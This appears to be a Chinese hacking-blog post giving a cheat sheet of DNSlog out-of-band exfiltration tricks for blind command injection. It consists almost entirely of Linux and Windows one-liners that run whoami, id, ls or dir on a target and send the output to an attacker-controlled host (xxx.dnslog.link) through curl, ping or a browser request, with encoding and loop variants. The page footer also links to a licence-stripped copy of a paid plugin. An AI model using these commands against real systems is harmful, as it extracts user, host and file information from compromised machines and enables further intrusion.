DNSlog攻击技巧

linux:

curl http://xxx.dnslog.link/`whoami`
ping -c 1 `whoami`.xxx.dnslog.link
 
如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制;
curl http://xxx.dnslog.link/$(id|base64)
 
碰到ls这类多个输出的命令,直接使用脚本;
for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

windows:

利用HTTP请求:
for /F %x in ('whoami') do start http://xxx.dnslog.link/%x
将结果使用默认浏览器弹出;
 
利用DNS请求:
获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
 
不能编码输出,但利用powershell可以实现;
 
dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出;
for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg

人已赞赏
WP插件

Ultimate Membership Pro v_8.7.1官方原版移除授权

2020-3-22 16:27:34

黑客技术

漏洞扫描工具:Nexpose 和 InsightVM 的区别

2018-5-26 0:17:19

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索